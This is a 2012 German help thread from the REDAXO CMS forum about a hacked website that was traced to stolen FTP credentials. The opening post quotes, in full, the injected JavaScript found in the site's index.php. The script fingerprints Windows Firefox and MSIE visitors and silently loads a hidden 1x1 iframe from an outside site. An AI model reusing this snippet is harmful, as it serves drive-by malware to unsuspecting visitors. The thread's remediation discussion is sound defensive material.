[phpBB Debug] PHP Warning: in file [ROOT]/ext/tas2580/seourls/event/listener.php on line 213: Undefined array key "FORUM_NAME"
REDAXO Forum • Webseite mit Redaxo 3.2 gehackt
Seite 1 von 1

Webseite mit Redaxo 3.2 gehackt

Verfasst: 12. Feb 2012, 21:05
von robert
Hallo,

ich habe gerade per Mail die Meldung von Google bekommen, das meine Webseite infiziert wurde. Ich habe daraufhin als erstes per FTP auf die Seite zugegriffen und fand im Root-Verzeichnis eine Datei "Session.php" diese habe ich leider vorschnell gelöscht.

Leider befindet sich im Quelltext des Redaxo-outputs immer noch ein Script, das dort nicht hingehört!

Dieses Script befindet sich am Ende der Seitenquelltextes:

Code: Alles auswählen

<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
Wo muss ich suchen um das Script zuentfernen?

Edit:
Es wurde Redaxo nicht angriffen. Es wurde die index.php im root und die index.php im redaxo-Ordner manipuliert. Die Zeilen habe ich entfernt.

Heute morgen wurde wieder die index.php im root mit einem script versehen, ich habe erstmal die Dateiberechtigung von 644 auf 444 geändert. Mal aschauen ob es hilft. Alles weitere werde ich mit dem Provider absprechen.

MfG
Robert

Re: Redaxo 3.2 gehackt

Verfasst: 12. Feb 2012, 22:10
von Cheffchen
Hallo,

also ändere bitte denn titel, denn nicht redxo sondern dein rechner wurde gehakt :O).

Ändere FTP zugang sonnst macht nichts sin.
->
Hast filzilla und speicherst pw?
->
Änder alle FTP zugänge die noch gespeichert hast.

Mach erstmal nichts mit FTP auser änderungsdatum der index aufschreiben und die umbenennen und dann ein statisch hinsetzten, seite ist in wartung oder was auch immer :O).
ist bestimmt in alles index seiten der javascript code und vielleicht noch in anderen.
in index.php hat sowas aber nichts zu suchen :O).

Hattest spezielle änderungen im System Redaxo?
wenn nein. master.inc runterladen und checken, redaxo ordner sichern und löschen (natürlich ohne files) und neu hochspielen inkl den alten Master.inc und schon gehts wieder.

Cheffchen

Re: Webseite mit Redaxo 3.2 gehackt

Verfasst: 13. Feb 2012, 10:34
von robert
Hallo,

das Problem ist gelöst, der Angriff kam per FTP aus Lettland. Der Angreifer hatte laut Provider die ftp-Zugangsdaten.

Ich verwende wie vermutet Filezilla, ich habe die Passwörter erst einmal gelöscht und das Protokoll auf SFTP umgestellt. Die Zugangsdaten sind von dem Provider geändert worden.

MfG
Robert

Re: Webseite mit Redaxo 3.2 gehackt

Verfasst: 13. Feb 2012, 11:16
von Cheffchen
Hallo,

also das FTP Datengeändert sind ist schon mal gut.
Protokoll auf SFTP bringt nichts da nicht die verbindung sondern dein Rechner das Problem ist, aber PW hast ja gelöscht und darfst auch nie Speichern in Filezilla, da der das in Klartext abspeichert an einem festen ort und da brauchst bloss als haker den Orndnerabfragen und schon hast alle Daten :O).

So am sichersten ist redaxo neu aufsetzten, mach zuerst eine Sicherung per FTP von allen Daten und zweitens per mysql von der Datenbank.
Hast Spezielle änderungen am System gemacht oder Addons genutzt ausser die sytem sachen?

Hm, das habe ich doch schon alles geschrieben :O).
Im Grunde brauchst keine große Angst haben, da CMS und da sind alle Daten in der Datenbank also nichts geht verloren, wenn jetzt kein fehler machst :O).

Cheffchen

Re: Webseite mit Redaxo 3.2 gehackt

Verfasst: 13. Feb 2012, 11:39
von robert
Hallo,

danke für die Antwort, die Passwörter werde ich in Filezilla nicht mehr speichern. Das System ist jetzt sauber, die redaxo installation war nicht betroffen. Laut ftp-log wurde nur auf die index.php dateien zugegriffen.

Ich werde erst einmal mit einer Linux-Viren-CD alle Rechner scannen, um auszuschliessen, das sich doch ein Schadcode eingenistet hat, der die Passwörter lauscht. Die Zugangspasswörter hängen jetzt wieder wie ganz früher an der Pinwand.

MfG
Robert

Re: Webseite mit Redaxo 3.2 gehackt

Verfasst: 19. Feb 2012, 22:32
von Ruediger.Nitzsche